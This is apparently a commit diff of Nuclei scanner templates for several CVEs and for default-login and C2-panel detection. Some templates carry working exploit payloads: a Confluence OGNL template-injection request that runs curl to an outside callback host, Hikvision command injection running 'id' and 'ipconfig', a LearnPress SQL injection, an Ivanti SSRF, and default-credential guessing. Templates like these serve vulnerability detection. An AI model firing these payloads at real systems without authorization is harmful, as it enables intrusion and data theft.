Adding new templates from Unreleased Templates Repo

http/cves/2023/CVE-2023-22527.yaml

@@ -1,49 +1,40 @@
 id: CVE-2023-22527
 
 info:
-  name: Atlassian Confluence - Remote Code Execution
+  name: Atlassian Confluence Unauthenticted Remote Code Execution
   author: iamnooob,rootxharsh,pdresearch
   severity: critical
-  description: |
-    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
-    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
+  description: |-
+    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
   reference:
     - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
     - https://jira.atlassian.com/browse/CONFSERVER-93833
-    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
     cve-id: CVE-2023-22527
     epss-score: 0.00044
-    epss-percentile: 0.08115
-    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
-  metadata:
-    max-request: 1
-    vendor: atlassian
-    product: confluence_data_center
-    shodan-query: http.component:"Atlassian Confluence"
-  tags: cve,cve2023,confluence,rce,ssti
+    epss-percentile: 0.08185
+  tags: cve,cve2023,confluence
 
 http:
   - raw:
       - |+
         POST /template/aui/text-inline.vm HTTP/1.1
         Host: {{Hostname}}
         Accept-Encoding: gzip, deflate, br
+        Accept: */*
         Content-Type: application/x-www-form-urlencoded
+        Content-Length: 335
 
-        label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))
+        label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})
 
+    matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - 'Empty{name='
       - type: dsl
         dsl:
-          - x_vuln_check != "" # check for custom header key exists
-          - contains(to_lower(body), 'empty{name=')
-        condition: and
-
-    extractors:
-      - type: dsl
-        dsl:
-          - x_vuln_check # prints the output of whoami
-# digest: 4b0a00483046022100cad74b2de250961c24ea16a5b8ed5cf9c1b4fa29b81cbfca33f3b72f5a4474c5022100c501f652babe15618734328d07936a3c399f964dfc0a67db2a8a61dd9e20a6ef:922c64590222798bb761d5b6d8e72950
+          - "contains(interactsh_protocol, 'dns')"

http/cves/2023/CVE-2023-6114.yaml

@@ -0,0 +1,37 @@
+id: CVE-2023-6114
+
+info:
+  name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
+  remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
+  reference:
+    - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
+    - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6114
+    - https://wpscan.com/plugin/duplicator/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-6114
+    cwe-id: CWE-552
+    epss-score: 0.00145
+    epss-percentile: 0.50326
+    cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
+  tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
+      - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '/tmp') && contains(body, '<title>Index of')"
+        condition: and

http/cves/2023/CVE-2023-6567.yaml

@@ -0,0 +1,33 @@
+id: CVE-2023-6567
+
+info:
+  name: LearnPress <= 4.2.5.7 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  remediation: Fixed in version 4.2.5.8
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
+    - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6567
+  classification:
+    cve-id: CVE-2023-6567
+  metadata:
+    max-request: 1
+    verified: true
+    publicwww-query: "/wp-content/plugins/learnpress"
+  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains_all(header, "lp_session_guest=", "application/json")'
+          - 'contains_all(body, "status\":\"success", "No courses were found")'
+        condition: and

http/cves/2023/CVE-2023-6895.yaml

@@ -1,56 +1,56 @@
 id: CVE-2023-6895
 
 info:
-  name: Hikvision Intercom Broadcasting System - Command Execution
-  author: archer
+  name: Hikvision IP ping.php - Command Execution
+  author: DhiyaneshDk
   severity: critical
-  description: |
-    Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+  description: A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
   reference:
-    - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
     - https://vuldb.com/?ctiid.248254
     - https://vuldb.com/?id.248254
-    - https://github.com/Marco-zcl/POC
-    - https://github.com/d4n-sec/d4n-sec.github.io
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-6895
     cwe-id: CWE-78
     epss-score: 0.0008
-    epss-percentile: 0.32716
+    epss-percentile: 0.33389
     cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     max-request: 1
     vendor: hikvision
     product: intercom_broadcast_system
     fofa-query: icon_hash="-1830859634"
-  tags: cve,cve2023,rce,hikvision
+  tags: cve,cve2023,hikvision,rce
 
 http:
-  - raw:
-      - |
-        POST /php/ping.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
+  - method: POST
+    path:
+      - "{{BaseURL}}/php/ping.php"
+    body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
 
-        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+    payloads:
+      command:
+        - 'id'
+        - 'cmd /c ipconfig'
 
     matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
+      - type: regex
+        part: body
+        regex:
+          - "Windows IP"
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+        condition: or
 
       - type: word
-        part: body
+        part: header
         words:
-          - "TTL="
+          - "text/html"
 
       - type: status
         status:
           - 200
-# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2024-21893.yaml

@@ -0,0 +1,45 @@
+id: CVE-2024-21893
+
+info:
+  name: Ivanti SAML - Server Side Request Forgery (SSRF)
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
+  reference:
+    - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
+    - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
+    - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2024-21893
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
+  metadata:
+    vendor: ivanti
+    product: connect_secure
+    shodan-query: "html:\"welcome.cgi?p=logo\""
+  tags: cve,cve2024,kev,ssrf,ivanti
+
+http:
+  - raw:
+      - |
+        POST /dana-ws/saml20.ws HTTP/1.1
+        Host: {{Hostname}}
+
+        <?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">	<soap:Body>		<ds:Signature		xmlns:ds="http://www.w3.org/2000/09/xmldsig#">			<ds:SignedInfo>				<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>				<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>			</ds:SignedInfo>			<ds:SignatureValue>qwerty</ds:SignatureValue>			<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">				<ds:RetrievalMethod URI="http://{{interactsh-url}}"/>				<ds:X509Data/>			</ds:KeyInfo>			<ds:Object></ds:Object>		</ds:Signature>	</soap:Body></soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - '/dana-na/'
+          - 'WriteCSS'
+        condition: and

http/default-logins/ispconfig-default-login.yaml

@@ -0,0 +1,61 @@
+id: ispconfig-default-login
+
+info:
+  name: ISPConfig - Default Password
+  author: pussycat0x
+  severity: high
+  description: |
+    ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+  metadata:
+    verified: true
+    shodan-query: http.title:"ispconfig"
+  tags: default-login,ispconfig
+
+http:
+  - raw:
+      - |
+        GET /lgoin HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /login/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Connection: close
+        Referer: {{RootURL}}/login/
+
+        username={{username}}&password={{password}}&s_mod=login&s_pg=index
+
+      - |
+        GET /sites/web_vhost_domain_list.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}/index.php
+
+    attack: pitchfork
+    payloads:
+      username:
+        - 'admin'
+        - 'guest'
+        - 'root'
+      password:
+        - 'admin'
+        - 'password'
+        - 'toor'
+
+    stop-at-first-match: true
+    host-redirects: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - Tools
+          - Websites
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/ares-rat-c2.yaml

@@ -0,0 +1,33 @@
+id: ares-rat-c2
+
+info:
+  name: Area Rat C2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Ares is a Python Remote Access Tool.
+  reference:
+    - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: product:'Ares RAT C2'
+  tags: c2,ir,osint,ares,panel,rat
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Ares</title>'
+          - 'Passphrase:'
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/caldera-c2.yaml

@@ -0,0 +1,32 @@
+id: caldera-c2
+
+info:
+  name: Caldera C2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
+  reference:
+    - https://github.com/mitre/caldera
+    - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: http.favicon.hash:-636718605
+  tags: c2,ir,osint,caldera,panel
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Login | CALDERA</title>'
+
+      - type: status
+        status:
+          - 200